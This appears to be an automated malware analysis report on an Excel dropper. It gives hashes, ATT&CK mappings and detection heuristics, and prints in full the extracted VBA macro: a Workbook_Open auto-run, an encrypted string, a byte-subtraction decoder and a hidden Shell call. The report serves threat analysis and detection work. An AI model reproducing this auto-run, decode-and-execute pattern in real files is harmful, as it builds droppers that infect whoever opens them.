Office (OLE) malware analysis — malicious · f0694d38c88c19bf

MALICIOUS

Office (OLE)

24.0 KB Created: 1996-10-08 23:32:33 Authoring application: Microsoft Excel First seen: 2015-03-15

MD5: f584a24f2423784935912fec4c69cac3 SHA-1: 6b441f8e8b387c0cf55f42a459bc1b6b475df097 SHA-256: f0694d38c88c19bf3f891b90cbed7588a0234895c93f819a88bf27e22550f2fc

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The file is an Excel document containing a Workbook_Open macro. This macro calls a function that appears to decrypt and execute a string via the Shell command. The ClamAV detection name 'Xls.Dropper.Agent-1582316' suggests this is a dropper malware. The macro's obfuscated nature and the use of Shell indicate it's designed to download and execute a secondary payload.

Heuristics 4

ClamAV: Xls.Dropper.Agent-1582316 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-1582316
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell oPOJidsf, vbHide
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2349 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2349 bytes
SHA-256: `eb5f40b662a4fe3d34894743b43b5709aac15a03df14dbcd95dc61523259ec7d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ЭтаКнига" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub Workbook_Open() tyrtyaag End Sub Attribute VB_Name = "Лист1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Лист2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Лист3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Private Const yY1UL = "NmaYSkhE" Private Const DDuKQ = "±ЪЕy‚¶€•ЬШѕЕѕРіЩН‡ёгНn•ЇѕК�·°ЧЖјЗ‹»ЗаХѕА™¶ібЏ°ёН«єЦЖЗЗ”–’ЬШЗїЪЙІіКЕё“Џ¶бХЙЌљ—‡џЏЏ†™ †›™ђ‚ЮМіЬЖїёСЫ}СЗМЖЦ–±ОГЂ ’ЌўІ®©xЗІ—јКИ·СР·ЬЄЎЃОЙ°”Љ”sРаѕОПЅsђј“є±~Їµ±ќЦРЅ№УСЅ¶©‡¶МКn’µћ »ЌЄ·ЄЁјЪМґХКИњі–іеЖ”sЮЬЇЯХyxї›Ѕ†µќґ··ЬЕї»ФЧ—µЏѕЛРЈ" Sub tyrtyaag() oPOJidsf = lqjWjFO(DDuKQ, yY1UL) Shell oPOJidsf, vbHide End Sub Attribute VB_Name = "Module2" Public Function lqjWjFO(ByVal strData As String, ByVal strKey As String) Dim bData() As Byte Dim bKey() As Byte bData = StrConv(strData, vbFromUnicode) bKey = StrConv(strKey, vbFromUnicode) For i = 0 To UBound(bData) If i <= UBound(bKey) Then bData(i) = bData(i) - bKey(i) Else bData(i) = bData(i) - bKey(i Mod UBound(bKey)) End If Next i lqjWjFO = StrConv(bData, vbUnicode) End Function

SHA-256: eb5f40b662a4fe3d34894743b43b5709aac15a03df14dbcd95dc61523259ec7d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
    tyrtyaag
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Const yY1UL = "NmaYSkhE"
Private Const DDuKQ = "±ЪЕy‚¶€•ЬШѕЕѕРіЩН‡ёгНn•ЇѕК�·°ЧЖјЗ‹»ЗаХѕА™¶ібЏ°ёН«єЦЖЗЗ”–’ЬШЗїЪЙІіКЕё“Џ¶бХЙЌљ—‡џЏЏ†™ †›™ђ‚ЮМіЬЖїёСЫ}СЗМЖЦ–±ОГЂ ’ЌўІ®©xЗІ—јКИ·СР·ЬЄЎЃОЙ°”Љ”sРаѕОПЅsђј“є±~Їµ±ќЦРЅ№УСЅ¶©‡¶МКn’µћ »ЌЄ·ЄЁјЪМґХКИњі–іеЖ”sЮЬЇЯХyxї›Ѕ†µќґ··ЬЕї»ФЧ—µЏѕЛРЈ"

Sub tyrtyaag()
oPOJidsf = lqjWjFO(DDuKQ, yY1UL)
Shell oPOJidsf, vbHide
End Sub


Attribute VB_Name = "Module2"
Public Function lqjWjFO(ByVal strData As String, ByVal strKey As String)

Dim bData() As Byte
Dim bKey() As Byte
bData = StrConv(strData, vbFromUnicode)
bKey = StrConv(strKey, vbFromUnicode)
For i = 0 To UBound(bData)
If i <= UBound(bKey) Then
bData(i) = bData(i) - bKey(i)
Else
bData(i) = bData(i) - bKey(i Mod UBound(bKey))
End If
Next i
 lqjWjFO = StrConv(bData, vbUnicode)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.